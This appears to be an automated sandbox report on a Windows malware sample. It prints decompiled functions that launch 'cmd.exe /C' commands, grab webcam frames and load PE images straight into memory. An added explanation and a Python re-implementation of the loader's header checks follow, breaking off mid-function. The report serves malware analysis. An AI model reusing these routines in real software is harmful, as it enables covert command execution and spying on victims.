                      • Opcode Fuzzy Hash: fbd6103d4cd2e0f5263852445a5d8a3cd223ee9a38f2474032305894be6a5d11
                      • Instruction Fuzzy Hash: FF01D671641B40EFC725BF799C4A42ABBE5FF05705340882EE5C382A63CBAD9815CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E007526DB(void* __edx, void* __ebp, void* __eflags, char _a16, char _a60, void* _a92, char _a96, void* _a128, void* _a152) {
                      				void* _t11;
                      
                      				_t41 = __eflags;
                      				_t11 = E0074427F(0,  &_a96, E00741F95(E00741E49( &_a16, __edx, __eflags, 0)));
                      				_t35 = L"/C ";
                      				ShellExecuteW(0, L"open", L"cmd.exe", E00741EEB(E00744405(0,  &_a60, L"/C ", _t41, _t11)), 0, 0);
                      				E00741EF0();
                      				E00741EF0();
                      				_t6 =  &_a16; // 0x744538
                      				E00741E74(_t6, _t35);
                      				E00741FC7();
                      				E00741FC7();
                      				return 0;
                      			}

                      APIs
                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0075271D
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • API ID: ExecuteShell
                      • String ID: /C $8Et$cmd.exe$open
                      • API String ID: 587946157-2214960574
                      • Opcode ID: b17d83831e7a0ce60b7bc4b348fbd7577aff0416c9f0a597434b26d61bd80737
                      • Instruction ID: 3dd88c48109ab77643add7c9c1b0e846714fc3fab6c5ac8d430dbc4444f37b23
                      • Opcode Fuzzy Hash: b17d83831e7a0ce60b7bc4b348fbd7577aff0416c9f0a597434b26d61bd80737
                      • Instruction Fuzzy Hash: 23F04471108344DBD304FBB0DC9A9BFB3A9BF91341F80092EB94682092EF7C594DD611
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E0074B82B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                      				char _v16;
                      				signed int _t34;
                      				signed int* _t49;
                      				signed int* _t57;
                      				void* _t65;
                      				signed int* _t66;
                      
                      				_t65 = __ecx;
                      				E00770058(__ecx, 0);
                      				E0074D4A5(__ecx + 4);
                      				E0074D4A5(__ecx + 0xc);
                      				E0074D48F(__ecx + 0x14);
                      				E0074D48F(__ecx + 0x1c);
                      				E0074D4A5(__ecx + 0x24);
                      				E0074D4A5(__ecx + 0x2c);
                      				_t76 = _a4;
                      				if(_a4 == 0) {
                      					_t49 =  &_v16;
                      					E0074B7D0(_t49, "bad locale name");
                      					E0077205A( &_v16, 0x7a85e0);
                      					asm("int3");
                      					_push(_t65);
                      					_t66 = _t49;
                      					E007703EB(_t66);
                      					E0074D48A( &(_t66[0xb]));
                      					E0074D48A( &(_t66[9]));
                      					E0074D48A( &(_t66[7]));
                      					E0074D48A( &(_t66[5]));
                      					E0074D48A( &(_t66[3]));
                      					E0074D48A( &(_t66[1]));
                      					_t57 = _t66;
                      					_t34 =  *_t57;
                      					__eflags = _t34;
                      					if(_t34 == 0) {
                      						return E0077F125(4);
                      					} else {
                      						__eflags = _t34 - 8;
                      						if(_t34 < 8) {
                      							_t37 = 0x7ab050 + _t34 * 0x18;
                      							__eflags = 0x7ab050 + _t34 * 0x18;
                      							return E007708FD(0x7ab050 + _t34 * 0x18, _t37);
                      						}
                      						return _t34;
                      					}
                      				} else {
                      					E007703A0(__ebx, __edx, __edi, _t76, __ecx, _a4);
                      					return _t65;
                      				}
                      			}

                      APIs
                      • std::_Lockit::_Lockit.LIBCPMT ref: 0074B836
                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0074B875
                        • Part of subcall function 007703A0: _Yarn.LIBCPMT ref: 007703BF
                        • Part of subcall function 007703A0: _Yarn.LIBCPMT ref: 007703E3
                      • std::bad_exception::bad_exception.LIBCMT ref: 0074B88D
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0074B89B
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                      • String ID: bad locale name
                      • API String ID: 3706160523-1405518554
                      • Opcode ID: c9b93a330052fdb41e1b34a71dd3007a4c7a4ba61cf9edc06e26eb9725e332c3
                      • Instruction ID: 77d435f4777c3bb46578f263c6026e954901b77921b235d09067f8ea01856af9
                      • Opcode Fuzzy Hash: c9b93a330052fdb41e1b34a71dd3007a4c7a4ba61cf9edc06e26eb9725e332c3
                      • Instruction Fuzzy Hash: 4EF08131500208EBC738FA24EC5FE9A73A8AF10390F50852DF98502492AF3CBD09C691
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0077CB84,0000000C,?,0077CB24,0000000C,007A8188), ref: 0077CBAF
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0077CBC2
                      • FreeLibrary.KERNEL32(00000000,?,?,?,0077CB84,0000000C,?,0077CB24,0000000C,007A8188), ref: 0077CBE5
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: 76c4c5c7a81f964161e54b523bc3f7063c7212eb78fbda29f71ae933abcfd3fb
                      • Instruction ID: 789a3bb2f17d8df6a1da5b9ca1f30348a227eb9e6a132df23103b0d263de0354
                      • Opcode Fuzzy Hash: 76c4c5c7a81f964161e54b523bc3f7063c7212eb78fbda29f71ae933abcfd3fb
                      • Instruction Fuzzy Hash: 60F06870650108BFCF169F54DC4ABAEBFB5EF08751F008169F809A22A0DB395E41CB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E0077B2BA(void* __ebx, void* __edx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
                      				signed int _v8;
                      				char _v16;
                      				int _v20;
                      				int _v24;
                      				char* _v28;
                      				int _v32;
                      				char _v36;
                      				intOrPtr _v44;
                      				char _v48;
                      				signed int _t59;
                      				char* _t61;
                      				intOrPtr _t63;
                      				int _t64;
                      				intOrPtr* _t65;
                      				signed int _t68;
                      				intOrPtr* _t71;
                      				short* _t73;
                      				int _t74;
                      				int _t76;
                      				char _t78;
                      				short* _t83;
                      				short _t85;
                      				int _t91;
                      				int _t93;
                      				char* _t98;
                      				int _t103;
                      				char* _t105;
                      				void* _t106;
                      				intOrPtr _t108;
                      				intOrPtr _t109;
                      				int _t110;
                      				short* _t113;
                      				int _t114;
                      				int _t116;
                      				signed int _t117;
                      
                      				_t106 = __edx;
                      				_t59 =  *0x7aa00c; // 0x67a7e35e
                      				_v8 = _t59 ^ _t117;
                      				_t61 = _a4;
                      				_t91 = _a12;
                      				_t116 = 0;
                      				_v28 = _t61;
                      				_v20 = 0;
                      				_t113 = _a8;
                      				_v24 = _t113;
                      				if(_t61 == 0 || _t91 != 0) {
                      					if(_t113 != 0) {
                      						E00775507(_t91,  &_v48, _t106, _a16);
                      						_t98 = _v28;
                      						if(_t98 == 0) {
                      							_t63 = _v44;
                      							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
                      								_t64 = WideCharToMultiByte( *(_t63 + 8), _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
                      								if(_t64 == 0 || _v20 != _t116) {
                      									L55:
                      									_t65 = E0077A504();
                      									_t114 = _t113 | 0xffffffff;
                      									 *_t65 = 0x2a;
                      									goto L56;
                      								} else {
                      									_t53 = _t64 - 1; // -1
                      									_t114 = _t53;
                      									L56:
                      									if(_v36 != 0) {
                      										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
                      									}
                      									goto L59;
                      								}
                      							}
                      							_t68 =  *_t113 & 0x0000ffff;
                      							if(_t68 == 0) {
                      								L51:
                      								_t114 = _t116;
                      								goto L56;
                      							}
                      							while(_t68 <= 0xff) {
                      								_t113 =  &(_t113[1]);
                      								_t116 = _t116 + 1;
                      								_t68 =  *_t113 & 0x0000ffff;
                      								if(_t68 != 0) {
                      									continue;
                      								}
                      								goto L51;
                      							}
                      							goto L55;
                      						}
                      						_t108 = _v44;
                      						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
                      							if( *((intOrPtr*)(_t108 + 4)) != 1) {
                      								_t114 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
                      								if(_t114 == 0) {
                      									if(_v20 != _t116 || GetLastError() != 0x7a) {
                      										L45:
                      										_t71 = E0077A504();
                      										_t116 = _t116 | 0xffffffff;
                      										 *_t71 = 0x2a;
                      										goto L51;
                      									} else {
                      										if(_t91 == 0) {
                      											goto L56;
                      										}
                      										_t73 = _v24;
                      										while(1) {
                      											_t109 = _v44;
                      											_t103 =  *(_t109 + 4);
                      											if(_t103 > 5) {
                      												_t103 = 5;
                      											}
                      											_t74 = WideCharToMultiByte( *(_t109 + 8), _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
                      											_t93 = _a12;
                      											_t110 = _t74;
                      											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
                      												goto L55;
                      											}
                      											if(_t110 + _t114 > _t93) {
                      												goto L56;
                      											}
                      											_t76 = _t116;
                      											_v32 = _t76;
                      											if(_t110 <= 0) {
                      												L43:
                      												_t73 = _v24 + 2;
                      												_v24 = _t73;
                      												if(_t114 < _t93) {
                      													continue;
                      												}
                      												goto L56;
                      											}
                      											_t105 = _v28;
                      											while(1) {
                      												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
                      												 *((char*)(_t105 + _t114)) = _t78;
                      												if(_t78 == 0) {
                      													goto L56;
                      												}
                      												_t76 = _v32 + 1;
                      												_t114 = _t114 + 1;
                      												_v32 = _t76;
                      												if(_t76 < _t110) {
                      													continue;
                      												}
                      												goto L43;
                      											}
                      											goto L56;
                      										}
                      										goto L55;
                      									}
                      								}
                      								if(_v20 != _t116) {
                      									goto L45;
                      								}
                      								_t28 = _t114 - 1; // -1
                      								_t116 = _t28;
                      								goto L51;
                      							}
                      							if(_t91 == 0) {
                      								L21:
                      								_t116 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
                      								if(_t116 == 0 || _v20 != 0) {
                      									goto L45;
                      								} else {
                      									if(_v28[_t116 - 1] == 0) {
                      										_t116 = _t116 - 1;
                      									}
                      									goto L51;
                      								}
                      							}
                      							_t83 = _t113;
                      							_v24 = _t91;
                      							while( *_t83 != _t116) {
                      								_t83 =  &(_t83[1]);
                      								_t16 =  &_v24;
                      								 *_t16 = _v24 - 1;
                      								if( *_t16 != 0) {
                      									continue;
                      								}
                      								break;
                      							}
                      							if(_v24 != _t116 &&  *_t83 == _t116) {
                      								_t91 = (_t83 - _t113 >> 1) + 1;
                      							}
                      							goto L21;
                      						}
                      						if(_t91 == 0) {
                      							goto L51;
                      						}
                      						while( *_t113 <= 0xff) {
                      							_t98[_t116] =  *_t113;
                      							_t85 =  *_t113;
                      							_t113 =  &(_t113[1]);
                      							if(_t85 == 0) {
                      								goto L51;
                      							}
                      							_t116 = _t116 + 1;
                      							if(_t116 < _t91) {
                      								continue;
                      							}
                      							goto L51;
                      						}
                      						goto L45;
                      					}
                      					 *((intOrPtr*)(E0077A504())) = 0x16;
                      					E0077695D();
                      					goto L59;
                      				} else {
                      					L59:
                      					return E0076FD1B(_v8 ^ _t117);
                      				}
                      			}

                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • Opcode ID: d53299585d93f83c0bdbf2d456244518b374d25149aa177b6fc15bb3f3de152e
                      • Instruction ID: ff14c1edaf3f3f078de0cfb21c648d250e49bd698d38c93ac6307d2802c98bed
                      • Opcode Fuzzy Hash: d53299585d93f83c0bdbf2d456244518b374d25149aa177b6fc15bb3f3de152e
                      • Instruction Fuzzy Hash: C87190719002569BCF21CFA5C884BBFBB75FF553A0F24822AE419A7182D7789D81C7A1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 68%
                      			E00744486(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char** _a8, signed int _a12) {
                      				char _v8;
                      				void* _v40;
                      				char _v44;
                      				char _v52;
                      				char _v56;
                      				char _v60;
                      				char _v76;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t26;
                      				char** _t28;
                      				intOrPtr* _t30;
                      				char* _t38;
                      				intOrPtr _t48;
                      				signed int _t57;
                      				signed int _t59;
                      				char* _t62;
                      				void* _t66;
                      				signed int _t67;
                      				void* _t69;
                      				signed int _t78;
                      				void* _t81;
                      				void* _t129;
                      				signed int _t131;
                      				signed int _t133;
                      				signed int _t134;
                      				signed int _t135;
                      				signed int _t136;
                      				signed int _t137;
                      				signed int _t141;
                      				void* _t144;
                      				void* _t145;
                      				intOrPtr* _t146;
                      
                      				_push(__edi);
                      				_t125 = _a8;
                      				_t129 = __ecx;
                      				_t26 = E007427DA(__ecx, _a8);
                      				_t81 = _t129;
                      				_t152 = _t26;
                      				if(_t26 == 0) {
                      					_push(__ebx);
                      					E007428B9(_t81, __edx, 0);
                      					_t28 = E0074223F();
                      					_t78 = _a12;
                      					_a8 = _t28;
                      					_t120 =  *_t28;
                      					__eflags =  !_t120 - _t78;
                      					if( !_t120 <= _t78) {
                      						E007428D8(_t129);
                      						asm("int3");
                      						_push(_t129);
                      						_t30 = E00741F95( &_v8);
                      						E007442A6( &_v8,  &_v44, 4, 0xffffffff);
                      						_t144 = (_t141 & 0xfffffff8) - 0xc;
                      						E007420EC(_t78, _t144, _t120, __eflags, 0x7ac238);
                      						_t145 = _t144 - 0x18;
                      						E007420EC(_t78, _t145, _t120, __eflags,  &_v60);
                      						E00757478( &_v76, _t120);
                      						_t146 = _t145 + 0x30;
                      						_t131 =  *_t30 - 0x3c;
                      						__eflags = _t131;
                      						if(__eflags == 0) {
                      							E00741E49( &_v52, _t120, __eflags, 0);
                      							_t38 = E00742489();
                      							E00741F95(E00741E49( &_v56, _t120, __eflags, 0));
                      							_t120 = _t38;
                      							_t133 = E0074F69B();
                      							__eflags = _t133;
                      							if(_t133 != 0) {
                      								 *0x7abac4 = E0074F931(_t133, "OpenCamera");
                      								 *0x7abac0 = E0074F931(_t133, "CloseCamera");
                      								_t48 = E0074F931(_t133, "GetFrame");
                      								_t120 = "FreeFrame";
                      								 *0x7abac8 = _t48;
                      								 *0x7ababc = E0074F931(_t133, "FreeFrame");
                      								 *0x7abaaa = 1;
                      								E007420EC(_t78, _t146 - 0x18, "FreeFrame", __eflags, 0x7ac1b8);
                      								_push(0x1b);
                      								goto L23;
                      							}
                      						} else {
                      							_t134 = _t131 - 1;
                      							__eflags = _t134;
                      							if(_t134 == 0) {
                      								__eflags =  *0x7aba77;
                      								if(__eflags != 0) {
                      									goto L20;
                      								}
                      							} else {
                      								_t135 = _t134 - 1;
                      								__eflags = _t135;
                      								if(_t135 == 0) {
                      									 *0x7abac0();
                      									 *0x7aba77 = 0;
                      								} else {
                      									_t136 = _t135 - 1;
                      									__eflags = _t136;
                      									if(_t136 == 0) {
                      										_t57 =  *0x7abac4();
                      										 *0x7aba77 = _t57;
                      										__eflags = _t57;
                      										if(__eflags == 0) {
                      											goto L15;
                      										} else {
                      											L20:
                      											_t120 = E00776769(_t52, E00741F95(E00741E49( &_v52, _t120, __eflags, 0)));
                      											E0074471E(_a4, _t54, __eflags);
                      										}
                      									} else {
                      										_t137 = _t136 - 1;
                      										__eflags = _t137;
                      										if(_t137 == 0) {
                      											_t59 =  *0x7abac4();
                      											 *0x7aba77 = _t59;
                      											__eflags = _t59;
                      											if(__eflags == 0) {
                      												L15:
                      												E007420EC(_t78, _t146 - 0x18, _t120, __eflags, 0x7ac1b8);
                      												_push(0x41);
                      												L23:
                      												E00744AA4(_t78, _a4, _t120, __eflags);
                      											} else {
                      												_t62 = E00776769(_t60, E00741F95(E00741E49( &_v52, _t120, __eflags, _t137)));
												 *_t146 = 0x3e8; // 1000 ms, the argument consumed by the Sleep call below
												Sleep(??);
                      												_t120 = _t62;
                      												E0074471E(_a4, _t62, __eflags);
                      												 *0x7abac0();
                      											}
                      										}
                      									}
                      								}
                      							}
                      						}
                      						E00741E74( &_v52, _t120);
                      						E00741FC7();
                      						E00741FC7();
                      						__eflags = 0;
                      						return 0;
                      					} else {
                      						_t65 =  &(_t120[_t78]);
                      						_a12 =  &(_t120[_t78]);
                      						__eflags = _t78;
                      						if(__eflags != 0) {
                      							_push(0);
                      							_t67 = E00742815(_t78, _t129, _t120, _t125, __eflags, _t65);
                      							__eflags = _t67;
                      							if(_t67 != 0) {
                      								_push( *_a8);
                      								_t69 = E00742229(_t129);
                      								E0074159F(E00742229(_t129) + _t78 * 2, _t69);
                      								_push(_t78);
                      								E0074158B(E00742229(_t129), _t125);
                      								E00742888(_a12);
                      							}
                      						}
                      						_t66 = _t129;
                      						goto L7;
                      					}
                      				} else {
                      					_t66 = E007435BF(__ebx, _t129, __edx, _t125 - E00742229(_t81) >> 1, _t129, _t152, _t81, _t129, _t125 - E00742229(_t81) >> 1, _a12);
                      					L7:
                      					return _t66;
                      				}
                      			}

                      APIs
                        • Part of subcall function 007428D8: std::_Xinvalid_argument.LIBCPMT ref: 007428DD
                      • Sleep.KERNEL32(00000000,?), ref: 007445DB
                        • Part of subcall function 0074471E: __EH_prolog.LIBCMT ref: 00744723
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: H_prologSleepXinvalid_argumentstd::_
                      • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                      • API String ID: 834325642-3547787478
                      • Opcode ID: 606f32eaa98e3a5c1dc9908f3191b592c85fc4fdc7f1be6db9d434f3358b59ea
                      • Instruction ID: db0a2bcd5ef00e7daa2b9ad290bb7fdc8a0acbf94a5f938dd369c8d37803106e
                      • Opcode Fuzzy Hash: 606f32eaa98e3a5c1dc9908f3191b592c85fc4fdc7f1be6db9d434f3358b59ea
                      • Instruction Fuzzy Hash: 6B51D531B04214EBCB05FB74981EB6E3B99AF86700F408529F8059B7A3DF3C9D568796
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E0074F6A7(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
                      				intOrPtr _v8;
                      				signed int _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v52;
                      				char _v56;
                      				signed int _t59;
                      				signed int _t61;
                      				void* _t64;
                      				void* _t67;
                      				signed int _t72;
                      				void* _t78;
                      				signed int _t79;
                      				void* _t80;
                      				signed int _t82;
                      				signed int _t83;
                      				signed int _t85;
                      				signed int _t87;
                      				signed int _t88;
                      				signed int _t91;
                      				void* _t92;
                      				signed int _t93;
                      				intOrPtr* _t96;
                      				signed int _t98;
                      				signed int _t113;
                      				void* _t115;
                      				signed int _t118;
                      				void* _t124;
                      				signed int _t126;
                      				intOrPtr _t128;
                      				signed int _t129;
                      				void* _t130;
                      				signed int _t131;
                      				void* _t132;
                      				void* _t133;
                      
                      				_t115 = 0x40;
                      				_v16 = __edx;
                      				_v8 = __ecx;
                      				_t124 = 0;
                      				if(E0074F14A(__edx, _t115) == 0) {
                      					L33:
                      					return 0;
                      				}
                      				if( *((intOrPtr*)(__ecx)) == 0x5a4d) {
                      					_t59 = E0074F14A(__edx,  *((intOrPtr*)(__ecx + 0x3c)) + 0xf8);
                      					__eflags = _t59;
                      					if(_t59 == 0) {
                      						goto L33;
                      					}
                      					_t96 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
                      					__eflags =  *_t96 - 0x4550;
                      					if( *_t96 != 0x4550) {
                      						goto L2;
                      					}
                      					__eflags =  *((intOrPtr*)(_t96 + 4)) - 0x14c;
                      					if( *((intOrPtr*)(_t96 + 4)) != 0x14c) {
                      						goto L2;
                      					}
                      					__eflags =  *(_t96 + 0x38) & 0x00000001;
                      					if(( *(_t96 + 0x38) & 0x00000001) != 0) {
                      						goto L2;
                      					}
                      					_t118 =  *(_t96 + 6) & 0x0000ffff;
                      					_t61 =  *(_t96 + 0x14) & 0x0000ffff;
                      					__eflags = _t118;
                      					if(_t118 == 0) {
                      						L14:
                      						__imp__GetNativeSystemInfo( &_v56);
                      						_t128 = E0074F139( *((intOrPtr*)(_t96 + 0x50)), _v52);
                      						_v20 = _t128;
                      						_t64 = E0074F139(_t124, _v52);
                      						__eflags = _t128 - _t64;
                      						if(_t128 != _t64) {
                      							goto L2;
                      						}
                      						_push(0);
                      						_t129 = E0074F643( *((intOrPtr*)(_t96 + 0x34)), _t128, 0x3000, 4);
                      						_t133 = _t132 + 0x14;
                      						_v12 = _t129;
                      						__eflags = _t129;
                      						if(_t129 != 0) {
                      							L18:
                      							_t67 = HeapAlloc(GetProcessHeap(), 8, 0x40);
                      							_t126 = _t67;
                      							__eflags = _t126;
                      							if(_t126 != 0) {
                      								 *(_t126 + 4) = _t129;
                      								 *(_t126 + 0x34) =  *(_t126 + 0x34) & 0x00000000;
                      								 *((intOrPtr*)(_t126 + 0x1c)) = E0074F643;
                      								 *(_t126 + 0x14) = ( *(_t96 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
                      								 *((intOrPtr*)(_t126 + 0x20)) = E0074F65A;
                      								 *((intOrPtr*)(_t126 + 0x24)) = E0074F66E;
                      								 *((intOrPtr*)(_t126 + 0x28)) = E0074F67C;
                      								 *((intOrPtr*)(_t126 + 0x2c)) = E0074F68D;
                      								 *((intOrPtr*)(_t126 + 0x3c)) = _v52;
                      								_t72 = E0074F14A(_v16,  *((intOrPtr*)(_t96 + 0x54)));
                      								__eflags = _t72;
                      								if(_t72 == 0) {
                      									L32:
                      									E0074FA47(_t126);
                      									goto L33;
                      								}
                      								_push(0);
                      								_t130 = E0074F643(_t129,  *((intOrPtr*)(_t96 + 0x54)), 0x1000, 4);
                      								E007724E0(_t130, _v8,  *((intOrPtr*)(_t96 + 0x54)));
                      								_t43 = _v8 + 0x3c; // 0x7930cc
                      								_t78 =  *_t43 + _t130;
                      								_t131 = _v12;
                      								 *_t126 = _t78;
                      								 *((intOrPtr*)(_t78 + 0x34)) = _t131;
                      								_t79 = E0074F15D(_v8, _v16, _t96, _t126);
                      								__eflags = _t79;
                      								if(_t79 == 0) {
                      									goto L32;
                      								}
                      								_t80 =  *_t126;
                      								_t123 =  *((intOrPtr*)(_t80 + 0x34)) ==  *((intOrPtr*)(_t96 + 0x34));
                      								__eflags =  *((intOrPtr*)(_t80 + 0x34)) ==  *((intOrPtr*)(_t96 + 0x34));
                      								if( *((intOrPtr*)(_t80 + 0x34)) ==  *((intOrPtr*)(_t96 + 0x34))) {
                      									_t98 = 1;
                      									__eflags = 1;
                      									 *((intOrPtr*)(_t126 + 0x18)) = 1;
                      								} else {
                      									 *((intOrPtr*)(_t126 + 0x18)) = E0074F459(_t126, _t123);
                      									_t98 = 1;
                      								}
                      								__eflags = E0074F4FE(_t126);
                      								if(__eflags != 0) {
                      									_t82 = E0074F304(_t126, __eflags);
                      									__eflags = _t82;
                      									if(_t82 == 0) {
                      										goto L32;
                      									}
                      									_t83 = E0074F428(_t126);
                      									__eflags = _t83;
                      									if(_t83 == 0) {
                      										goto L32;
                      									}
                      									_t85 =  *( *_t126 + 0x28);
                      									__eflags = _t85;
                      									if(_t85 == 0) {
                      										_t54 = _t126 + 0x38;
                      										 *_t54 =  *(_t126 + 0x38) & 0x00000000;
                      										__eflags =  *_t54;
                      										L38:
                      										return _t126;
                      									}
                      									_t87 = _t85 + _t131;
                      									__eflags =  *(_t126 + 0x14);
                      									if( *(_t126 + 0x14) == 0) {
                      										 *(_t126 + 0x38) = _t87;
                      										goto L38;
                      									}
                      									_t88 =  *_t87(_t131, _t98, 0);
                      									__eflags = _t88;
                      									if(_t88 != 0) {
                      										 *((intOrPtr*)(_t126 + 0x10)) = _t98;
                      										goto L38;
                      									}
                      									SetLastError(0x45a);
                      								}
                      								goto L32;
                      							}
                      							_push(_t67);
                      							E0074F65A(_t129, _t67, 0x8000);
                      							L17:
                      							_push(0xe);
                      							L3:
                      							SetLastError();
                      							goto L33;
                      						}
                      						_push(0);
                      						_t91 = E0074F643(0, _v20, 0x3000, 4);
                      						_t129 = _t91;
                      						_v12 = _t91;
                      						_t133 = _t133 + 0x14;
                      						__eflags = _t129;
                      						if(_t129 != 0) {
                      							goto L18;
                      						}
                      						goto L17;
                      					}
                      					_t113 = _t96 + 0x24 + _t61;
                      					__eflags = _t113;
                      					do {
                      						__eflags =  *(_t113 + 4);
                      						_t92 =  *_t113;
                      						if( *(_t113 + 4) != 0) {
                      							_t93 = _t92 +  *(_t113 + 4);
                      							__eflags = _t93;
                      						} else {
                      							_t93 = _t92 +  *(_t96 + 0x38);
                      						}
                      						__eflags = _t93 - _t124;
                      						_t124 =  >  ? _t93 : _t124;
                      						_t113 = _t113 + 0x28;
                      						_t118 = _t118 - 1;
                      						__eflags = _t118;
                      					} while (_t118 != 0);
                      					goto L14;
                      				}
                      				L2:
                      				_push(0xc1);
                      				goto L3;
                      			}

                      APIs
                        • Part of subcall function 0074F14A: SetLastError.KERNEL32(0000000D,0074F6C6,0079F464,00000000,?), ref: 0074F150
                      • SetLastError.KERNEL32(000000C1,0079F464,00000000,?), ref: 0074F6DD
                      • GetNativeSystemInfo.KERNEL32(?,0079F464,00000000,?), ref: 0074F750
                      • GetProcessHeap.KERNEL32(00000008,00000040), ref: 0074F7BC
                      • HeapAlloc.KERNEL32(00000000), ref: 0074F7C3
                      • SetLastError.KERNEL32(0000045A), ref: 0074F8D5
                        • Part of subcall function 0074F65A: VirtualFree.KERNEL32(00008000,00000000,00000000,?,0074F7DC,00000000,00000000,00008000,00000000), ref: 0074F666
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
                      • String ID:
                      • API String ID: 486403682-0
                      • Opcode ID: 357999c0f42044b2f05efc0a84fda57e8f4af116c2ec964c5b8585a484513487
                      • Instruction ID: 39ab84f1d28dcf577466941f595987927a2a2754f2240b1a733cd4d135dd0eca
                      • Opcode Fuzzy Hash: 357999c0f42044b2f05efc0a84fda57e8f4af116c2ec964c5b8585a484513487
                      • Instruction Fuzzy Hash: 85610170A00201EBDB11AF69CC85B3AB7B9FF84340F15403AE9049B281DBBCDD52CB95
                      Uniqueness

                      Uniqueness Score: -1.00%
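E0074F6A7 above is a MemoryModule-style in-memory PE loader: it checks the "MZ" and "PE\0\0" magics, requires Machine 0x14c (32-bit x86) and an even SectionAlignment, walks the section table to find the highest section end, compares that (page-aligned via GetNativeSystemInfo's dwPageSize) against SizeOfImage, and only then VirtualAllocs the image at ImageBase (falling back to any address), copies the headers, applies relocations and imports, and calls DllMain when IMAGE_FILE_DLL is set, setting ERROR_DLL_INIT_FAILED (0x45a) if that returns 0. The adjacent E0074F69B that the camera handler calls before resolving OpenCamera/CloseCamera/GetFrame/FreeFrame via E0074F931 appears to be the entry wrapper for this loader, although the listing here does not show it. The Python below is an added example for this report, not code from the sample or from Joe Sandbox: it re-implements the header validation using exactly the field offsets and error codes visible in the listing (0xd from the CheckSize subcall, 0xc1 for a malformed image) and exercises it on a constructed minimal PE32 DLL. The page size of 0x1000 is an assumption standing in for the GetNativeSystemInfo result; build_sample_dll and loader_error_code are helpers invented for the example.

```python
# Added example (not part of the sandbox report or the sample): Python
# re-implementation of the header validation done by the in-memory PE loader
# E0074F6A7 above (MemoryModule-style). Field offsets follow the listing:
# e_lfanew @0x3c; from the NT headers: Machine +4, NumberOfSections +6,
# SizeOfOptionalHeader +0x14, Characteristics +0x16, AddressOfEntryPoint +0x28,
# ImageBase +0x34, SectionAlignment +0x38, SizeOfImage +0x50, SizeOfHeaders +0x54.
import struct

# Win32 error codes the listing passes to SetLastError
ERROR_INVALID_DATA = 0x0D       # CheckSize failure (subcall 0074F14A)
ERROR_BAD_EXE_FORMAT = 0xC1     # label L2 in the listing
IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_FILE_DLL = 0x2000         # tested as (Characteristics >> 13) & 1
SIZEOF_IMAGE_NT_HEADERS32 = 0xF8
SIZEOF_SECTION_HEADER = 0x28


class LoaderError(Exception):
    def __init__(self, code):
        super().__init__(f"SetLastError({code:#x})")
        self.code = code


def align_up(value, alignment):
    # E0074F139: round value up to a multiple of the page size
    return (value + alignment - 1) & ~(alignment - 1)


def check_size(size, needed):
    # E0074F14A: the buffer must hold at least `needed` bytes
    if size < needed:
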